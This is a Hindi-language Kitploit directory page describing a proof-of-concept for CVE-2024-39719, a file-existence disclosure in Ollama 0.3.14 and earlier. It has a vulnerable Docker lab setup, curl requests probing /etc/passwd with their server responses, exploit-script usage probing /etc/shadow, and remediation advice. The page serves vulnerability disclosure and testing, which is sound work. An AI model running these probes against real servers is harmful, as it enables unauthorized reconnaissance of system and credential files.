Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-39719 | Kitploit
उपकरण/GitHubGitHub/srcx404/cve-2024-39719
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsrcx404/cve-2024-39719

CVE-2024-39719

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ollama फ़ाइल अस्तित्व प्रकटीकरण भेद्यता (CVE-2024-39719) विश्लेषण

中文

भेद्यता अवलोकन

CVE-2024-39719 एक फ़ाइल अस्तित्व प्रकटीकरण भेद्यता है जो Ollama संस्करण 0.3.14 और उससे पहले के संस्करणों को प्रभावित करती है। यह भेद्यता हमलावरों को एक API एंडपॉइंट के माध्यम से सर्वर पर विशिष्ट फ़ाइलों के अस्तित्व का पता लगाने की अनुमति देती है, जिससे संभावित रूप से सूचना रिसाव हो सकता है।

रिलीज़ दिनांक: 31 अक्टूबर, 2024

भेद्यता विवरण

मूल कारण

यह भेद्यता Ollama के /api/create एंडपॉइंट में मौजूद है। जब कोई हमलावर पथ पैरामीटर के साथ CreateModel API को कॉल करता है, तो सर्वर पथ के अस्तित्व में होने या न होने के आधार पर अलग-अलग त्रुटि संदेश लौटाता है। यह व्यवहार हमलावर को त्रुटि संदेशों का विश्लेषण करके यह निर्धारित करने की अनुमति देता है कि सर्वर पर कोई विशिष्ट फ़ाइल या निर्देशिका मौजूद है या नहीं।

मूल समस्या यह है कि उपयोगकर्ता इनपुट को संभालते समय, सिस्टम पथ अस्तित्व की जानकारी को उचित रूप से छिपाने के बजाय सीधे क्लाइंट को फ़ाइल सिस्टम त्रुटियाँ उजागर कर देता है।

प्रभावित संस्करण

यह भेद्यता Ollama के 0.3.14 तक के सभी संस्करणों को प्रभावित करती है।

प्रभाव

यद्यपि फ़ाइल अस्तित्व प्रकटीकरण भेद्यता शुरू में कम गंभीर लग सकती है, यह निम्न कार्य कर सकती है:

  1. अधिक जटिल हमलों में प्रारंभिक कदम के रूप में कार्य करना, हमलावरों को सर्वर जानकारी एकत्र करने में मदद करना
  2. महत्वपूर्ण कॉन्फ़िगरेशन फ़ाइलों, प्रमाणपत्रों या संवेदनशील डेटा फ़ाइलों की उपस्थिति का पता लगाने के लिए उपयोग किया जाना
  3. हमलावरों को अधिक लक्षित हमले करने में सहायता करना
  4. विशिष्ट वातावरणों में सूचना रिसाव का कारण बनना, जैसे विशेष उपयोगकर्ताओं या सिस्टम विशेषताओं के अस्तित्व की पुष्टि करना

भेद्यता पुनरुत्पादन

पर्यावरण सेटअप

  1. निम्नलिखित Docker Compose फ़ाइल का उपयोग करके एक भेद्य Ollama पर्यावरण बनाएँ:
root@kitploit:~
services:
  ollama:
    image: ollama/ollama:0.3.14
    container_name: ollama
    volumes:
      - ollama:/root/.ollama
    ports:
      - "11434:11434"

volumes:
  ollama:
  1. सेवा शुरू करें:
root@kitploit:~
docker compose up -d
  1. सेवा शुरू होने के बाद, आप http://your-ip:11434/ तक पहुँच कर पुष्टि कर सकते हैं कि Ollama 0.3.14 चल रहा है।

पुनरुत्पादन चरण

1. गैर-मौजूद फ़ाइलों का परीक्षण

एक गैर-मौजूद फ़ाइल तक पहुँचने का प्रयास करने के लिए curl का उपयोग करके अनुरोध भेजें:

root@kitploit:~
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/tmp/non-existing"}'

प्रतिक्रिया:

root@kitploit:~
{"error":"error reading modelfile: open /tmp/non-existing: no such file or directory"}

2. मौजूद फ़ाइलों का परीक्षण

किसी मौजूद फ़ाइल, जैसे /etc/passwd, का परीक्षण करें:

root@kitploit:~
curl "http://your-ip:11434/api/create" -d '{"name": "file-leak-existence","path": "/etc/passwd"}'

प्रतिक्रिया:

root@kitploit:~
{"error":"no FROM line for the model was specified"}

इन विभिन्न त्रुटि संदेशों का विश्लेषण करके, एक हमलावर यह निर्धारित कर सकता है कि लक्षित पथ मौजूद है या नहीं, जिससे सर्वर की फ़ाइल संरचना के बारे में जानकारी प्राप्त होती है। ध्यान दें कि सर्वर द्वारा लौटाई गई जानकारी संस्करण के आधार पर भिन्न हो सकती है।

भेद्यता निवारण

आधिकारिक समाधान

Ollama ने नए संस्करणों में इस भेद्यता को ठीक कर दिया है। समाधानों में शामिल हैं:

  1. फ़ाइल अस्तित्व की जानकारी लीक होने से बचने के लिए त्रुटि प्रबंधन को मानकीकृत करना
  2. उपयोगकर्ता-प्रदत्त पथों का कठोर सत्यापन और फ़िल्टरिंग लागू करना
  3. अधिक सामान्य त्रुटि संदेशों का उपयोग करना जो सीधे फ़ाइल सिस्टम जानकारी उजागर नहीं करते

अनुशंसित निवारण चरण

  1. Ollama को अपग्रेड करें: सबसे प्रभावी समाधान Ollama के नवीनतम संस्करण में अपग्रेड करना है।
  2. एक्सेस नियंत्रण: API एंडपॉइंट तक पहुँच प्रतिबंधित करें, केवल अधिकृत उपयोगकर्ताओं को अनुमति दें।
  3. नेटवर्क अलगाव: जब संभव हो, बाहरी पहुँच कम करने के लिए Ollama सेवाओं को पृथक नेटवर्क में तैनात करें।
  4. निगरानी: API कॉल की निगरानी बढ़ाएँ, विशेष रूप से /api/create एंडपॉइंट तक असामान्य पहुँच पैटर्न का पता लगाने पर ध्यान केंद्रित करें।

एक्सप्लॉइट स्क्रिप्ट का उपयोग

प्रदान की गई Python स्क्रिप्ट आपको यह परीक्षण करने की अनुमति देती है कि कोई Ollama सर्वर CVE-2024-39719 के प्रति भेद्य है या नहीं।

आवश्यकताएँ

  • Python 3.x
  • आवश्यक पैकेज: requests, termcolor

स्थापना

root@kitploit:~
pip install requests termcolor

उपयोग

root@kitploit:~
python CVE_2024_39719.py -u <ollama-server-url> [-f <file-to-check>]

विकल्प

  • -u, --url: Ollama सर्वर का URL (आवश्यक)
  • -f, --file: अस्तित्व की जाँच करने हेतु फ़ाइल (डिफ़ॉल्ट "/etc/passwd")

उदाहरण

root@kitploit:~
# Check if a server is vulnerable
python CVE_2024_39719.py -u http://your-ip:11434

# Check if a specific file exists
python CVE_2024_39719.py -u http://your-ip:11434 -f /etc/shadow

संदर्भ

  • राष्ट्रीय भेद्यता डेटाबेस में CVE-2024-39719
  • Ollama GitHub रिपॉजिटरी
  • Ollama सुरक्षा सलाहकार

अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और वैध सुरक्षा परीक्षण के लिए प्रदान की गई है। किसी भी सिस्टम का भेद्यता परीक्षण करने से पहले हमेशा सुनिश्चित करें कि आपके पास उचित प्राधिकरण है। अनधिकृत परीक्षण कानूनों और विनियमों का उल्लंघन कर सकता है।

टूल डाउनलोड करें